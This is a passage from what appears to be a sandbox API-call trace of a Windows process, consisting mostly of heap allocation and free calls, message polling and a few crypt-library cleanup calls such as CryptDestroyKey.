RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0188.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0188.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0188.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0188.370] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0188.370] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0188.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0188.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0188.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0188.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0188.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0188.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0188.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0188.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0188.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0188.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0188.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0188.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0188.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0188.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0188.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0188.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0188.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0188.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0188.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0188.372] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0188.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0188.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0188.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0188.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0188.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0188.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0188.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0188.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0188.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0188.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0188.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0188.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0188.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0188.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0188.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0188.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0188.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0188.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0188.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0188.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50938, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0188.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0188.373] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0188.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0188.373] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0188.373] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0188.374] CryptDestroyKey (hKey=0xa86f90) returned 1 [0188.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0188.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0188.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0188.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0188.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0188.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0188.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0188.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0188.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0188.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0188.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0188.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0188.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0188.376] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0188.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0188.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0188.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0188.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0188.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0188.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0188.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0188.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0188.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0188.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0188.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0188.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0188.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.376] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0188.376] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0188.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0188.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0188.377] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0188.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0188.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0188.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0188.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0188.377] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0188.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0188.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0188.377] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0188.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0188.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0188.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0188.377] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0188.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0188.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0188.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0188.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0188.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0188.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0188.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0188.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0188.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0188.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0188.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0188.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0188.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0188.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0188.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0188.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0188.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0188.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0188.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.380] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0188.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0188.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0188.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0188.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0188.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0188.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0188.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0188.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0188.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0188.381] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0188.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0188.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0188.381] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0188.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0188.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0188.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0188.381] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0188.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0188.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0188.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0188.381] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0188.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0188.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0188.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0188.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0188.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0188.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0188.381] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0188.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0188.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0188.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0188.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0188.382] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0188.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0188.382] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0188.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0188.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0188.382] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0188.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0188.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0188.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0188.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0188.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0188.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0188.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0188.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0188.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0188.382] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0188.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0188.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0188.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0188.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0188.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0188.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0188.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0188.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: 